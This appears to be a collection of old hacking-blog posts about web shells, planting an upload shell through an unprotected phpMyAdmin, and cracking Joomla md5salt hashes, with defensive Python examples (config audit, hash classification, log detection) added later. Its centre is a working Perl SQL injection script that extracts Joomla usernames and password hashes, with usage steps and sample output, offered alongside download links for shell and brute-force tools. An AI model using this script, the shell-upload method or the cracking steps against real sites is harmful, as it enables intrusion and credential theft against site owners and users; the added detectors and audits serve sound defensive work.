Various famous shell injection

Maybe some of you do not know what shell injection is. A shell injection is a script (commonly called a web shell) that we put on the target server, which is the entrance for us to master the server. With the shell we can see the contents of the database server, which is binding, and we can even get an interactive shell that will be used for rooting. This shell can run on Linux and Windows systems, and we adjust the commands to the target OS.
The following are screenshots of the shell injection:

r57 shell

c99shell

c100shell

My Ubuntu...

This is the latest look of the Ubuntu Linux 8.10 which I use for hacking.
A cooler and scarier look...


My Desktop



My Mozilla



Upload Shell on phpMyAdmin

Greetings all.
For those who already know this trick, I am sorry;
there may be some colleagues who do not know it.

phpMyAdmin should be protected with a password, but there are still some websites that leave the default (no password), and we can use that.

Here I will show you how to upload a shell on localhost.
We will create a form called form.php and a file called upload.php that allows us to upload a shell.

First we must know the path of its document root
Picture 1


Then we go into phpMyAdmin to create a database.
Picture 2.


In the picture above we create a database called shell in the "Create new database" text box. After that, select the database called shell, select the SQL tab, and enter the SQL command. The command below will create a table called form and will create a file called form.php in the DOCUMENT ROOT; the file will contain the HTML code.
Like Picture 3


If there are no errors, a file called form.php will be created in the DOCUMENT ROOT.
Picture 4.


Once we have made the form, we must create the file uploader.
The command below will create a table called upload and will create a file called upload.php in the DOCUMENT ROOT; the file will contain the PHP code for the form.
Like Picture 5


If there are no errors, a file called upload.php will be created in the DOCUMENT ROOT.
Picture 6.


After that succeeds, we just call the form.php file in the DOCUMENT ROOT; in this example it is http://localhost/form.php
Picture 7.


We just have to upload a shell to be placed on the web. For example, I will upload a shell; if successful, it brings up a blank page and a URL that points to a file called "upload.php". On my localhost it points to http://localhost/upload.php
Like Picture 8.


This is an example of a successful shell upload to my localhost server.
Picture 9.


For the script and shell, please download at
http://www.ziddu.com/download/8112213/upload_shell_on_phpmyadmin.zip.html

Apologies in advance if there are errors.
Please correct me.
Thanks
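
A configuration check for the settings this trick depends on, as an added example that is not part of the original post: it flags a phpMyAdmin config.inc.php that allows password-less login and a MySQL config that leaves secure_file_priv empty. The sample file contents are constructed, and it is an assumption that the commands in the missing pictures rely on MySQL's server-side file export, which secure_file_priv restricts.

```python
import re

# Constructed sample files for illustration (not taken from the post).
SAMPLE_PMA = """<?php
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
"""
SAMPLE_MYCNF = """[mysqld]
datadir = /var/lib/mysql
secure_file_priv = ""
"""

def php_setting(text, key):
    """Last uncommented value assigned to $cfg[...]['key'], or None."""
    pat = re.compile(r"^\s*\$cfg\[.*\]\['" + re.escape(key) + r"'\]\s*=\s*(.+?);")
    value = None
    for line in text.splitlines():
        m = pat.match(line)
        if m:
            value = m.group(1).strip().strip("'\"")
    return value

def audit_phpmyadmin(text):
    findings = []
    if (php_setting(text, "AllowNoPassword") or "").lower() == "true":
        findings.append("AllowNoPassword=true: empty-password logins are accepted")
    if php_setting(text, "auth_type") == "config":
        findings.append("auth_type=config: no login prompt, stored credentials are used")
    if php_setting(text, "password") == "":
        findings.append("stored MySQL password is empty")
    return findings

def audit_mycnf(text):
    m = re.search(r"^[ \t]*secure[_-]file[_-]priv[ \t]*=[ \t]*(.*)$", text, re.M)
    if m is None:
        return ["secure_file_priv not set: effective value depends on the build default"]
    if m.group(1).strip().strip("'\"") == "":
        return ["secure_file_priv is empty: the server may write files to any path it can access"]
    return []

if __name__ == "__main__":
    for finding in audit_phpmyadmin(SAMPLE_PMA) + audit_mycnf(SAMPLE_MYCNF):
        print("[!]", finding)
```

A clean result needs a non-empty MySQL password, auth_type set to cookie or http, AllowNoPassword false, and secure_file_priv set to NULL or to a directory outside the document root.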


Hacking sites

There are many sites that provide information for hacking activities in this world. These are some of them:

http://milw0rm.com/
http://www.securityfocus.com/
http://darkc0de.com/
http://www.darkmindz.com/
http://www.jasakom.com/
http://www.kecoak-elektronik.net/log/

From the sites above we can get a lot of information and hacking techniques.
Hopefully helpful...

Joomla Password Encryption

Joomla has implemented an encryption model called md5salt.
An example is faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A

The hash is the first part, faae726c2d28d65735ba190c5b249e54, and the salt is at the end, G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A; they are separated by a colon ":".
For the attacker, the salt works to assist in finding the actual password.
What this means is that the password in plain-text form, joined with its salt, generates the Joomla password hash. In other words: x + salt = Joomla hash. So, implemented through md5 encryption:

md5(x + salt) = hash
so :
md5(x + G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A) = faae726c2d28d65735ba190c5b249e54

To crack it, we use a dictionary tool that can be downloaded at
http://www.ziddu.com/download/8111597/brute.zip.html

Congratulations on cracking Joomla passwords, and good luck.
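
Because md5(x + salt) is a single fast hash, a dictionary attack on it is cheap, so an administrator will want to know which accounts still store this format. The following added example (not code from the original post) classifies stored Joomla password values and lists accounts that need a reset or rehash. The sample rows are constructed apart from the example hash quoted above, and the $2y$ and $P$ prefixes are those of the bcrypt and phpass formats that newer Joomla releases store.

```python
import hashlib
import hmac
import re

MD5SALT = re.compile(r"[0-9a-f]{32}:[A-Za-z0-9]+")   # hash:salt as described above
MD5_RAW = re.compile(r"[0-9a-f]{32}")

def make_md5salt(password, salt):
    """Build a stored value exactly as the post describes: md5(x + salt):salt."""
    return hashlib.md5((password + salt).encode()).hexdigest() + ":" + salt

def verify_md5salt(candidate, stored):
    """Login-time check for the legacy format, with constant-time comparison."""
    digest, salt = stored.split(":", 1)
    computed = hashlib.md5((candidate + salt).encode()).hexdigest()
    return hmac.compare_digest(computed, digest)

def classify(stored):
    if stored.startswith(("$2y$", "$2a$")):
        return "bcrypt"
    if stored.startswith("$P$"):
        return "phpass"
    if MD5SALT.fullmatch(stored):
        return "md5salt"
    if MD5_RAW.fullmatch(stored):
        return "md5-unsalted"
    return "unknown"

def accounts_needing_rehash(rows):
    """Usernames whose stored value is still a fast MD5-based hash."""
    return [user for user, stored in rows
            if classify(stored) in ("md5salt", "md5-unsalted")]

# Constructed rows as (username, password column); only the first value is from the post.
SAMPLE_ROWS = [
    ("admin", "faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A"),
    ("editor", make_md5salt("constructed-password", "ConstructedSalt123")),
    ("author", "$2y$10$" + "x" * 53),   # placeholder with a bcrypt prefix
]

if __name__ == "__main__":
    for user in accounts_needing_rehash(SAMPLE_ROWS):
        print("legacy hash, force reset or rehash on next login:", user)
```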

Simple Script SQL Injection joomla

This is a simple Joomla SQL injection script that can retrieve passwords in md5 and md5salt form, and we can choose which row of the table jos_users to read.

!/usr/bin/perl -w
print "\t\t###############################################\n\n";
print "\t\t# Joomla SQL Injection #\n\n";
print "\t\t###############################################\n\n";
use LWP::UserAgent;
die "Contoh: perl $0 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' 'baris_dari_pass'\n" unless @ARGV;
$user="username";
$pass="password";
$tabel="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] .
"+AND+1=2+union+all+select+1,concat(CHAR(60,117,115,101,114,62),
".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),
".$pass.",CHAR(60,112,97,115,115,62)),3,4,5+from+".$tabel."
+LIMIT+".$ARGV[1].",1--";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /(.*?)/){
print "\n[+] Username : $1";
}
if ($answer =~/(.*?)/){
print "\n[+] password : $1\n\n";
print "\t\t# berhasil #\n\n";}
else{print "\n[-] gagal...\n";}

What needs to be done is to determine the number of existing columns and which number appears.
Example:
1. the target is http://joomla_web.com/path/index.php?option=com_contoh&id=1
2. the number of columns is 5 ===>+AND+1=2+UNION+SELECT+1,2,3,4,5--
3. the number that appears is 2 ===>+AND+1=2+UNION+SELECT+1,concat(CHAR(60,117,115,101,114,62),
".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),
".$pass.",CHAR(60,112,97,115,115,62)),3,4,5--

Then you can use it:
perl joomla.pl 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' '0'
Notes:
joomla.pl ==> name of the file
'http://joomla_web.com/path/index.php?option=com_contoh&id=1' ==> the Joomla URL that has the vulnerability
'0' ==> first row of the table jos_users; for the second row replace it with '1', and so on

If successful, it will look like this:

###################################################

# Joomla SQL Injection #


###################################################


[+] Username : admin
[+] password : faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A

# berhasil #

Now all that is left is to crack the md5salt.

Or you can download that script here:
http://www.ziddu.com/download/8111490/joomla.zip.html
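
The requests this script sends leave a recognisable pattern in the web server access log. The following added example (not part of the original post) scans access-log lines for the markers visible in the script above: the AND 1=2 condition, UNION SELECT, the concat(CHAR(...)) delimiters, and a read from a *_users table. The log lines, IP addresses and timestamps are constructed samples.

```python
import re
from urllib.parse import unquote, unquote_plus

# Client IP and request target from an Apache combined-format line.
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

RULES = {
    "false-condition": re.compile(r"\band\s+1\s*=\s*2\b"),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "char-markers": re.compile(r"concat\s*\(\s*char\s*\("),
    "users-table": re.compile(r"\bfrom\s+\w+_users\b"),
}

def scan(lines):
    """Return (client_ip, sorted rule names) for each line that matches a rule."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        query = target.partition("?")[2]
        # Decode '+' and %xx, then %xx once more to catch double encoding.
        decoded = unquote(unquote_plus(query)).lower()
        matched = sorted(name for name, rx in RULES.items() if rx.search(decoded))
        if matched:
            hits.append((ip, matched))
    return hits

# Constructed log lines: one extraction request, one normal request, one column probe.
UA = '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"'
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2009:10:01:22 +0700] "GET /path/index.php?option=com_contoh'
    '&id=1+AND+1=2+union+all+select+1,concat(CHAR(60,117,115,101,114,62),username,'
    'CHAR(60,117,115,101,114,62)),3,4,5+from+jos_users+LIMIT+0,1-- HTTP/1.1" 200 5120 "-" ' + UA,
    '198.51.100.20 - - [12/Mar/2009:10:02:03 +0700] "GET /path/index.php?option=com_contoh'
    '&id=1 HTTP/1.1" 200 4876 "-" ' + UA,
    '203.0.113.7 - - [12/Mar/2009:10:00:58 +0700] "GET /path/index.php?option=com_contoh'
    '&id=1%20AND%201=2%20UNION%20SELECT%201,2,3,4,5-- HTTP/1.1" 200 4990 "-" ' + UA,
]

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG):
        print(ip, ",".join(rules))
```

A hit on users-table together with char-markers means account data was being read out, so the accounts in that table should be treated as exposed; the underlying fix is a parameterised query or an integer cast on the id parameter in the affected component.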
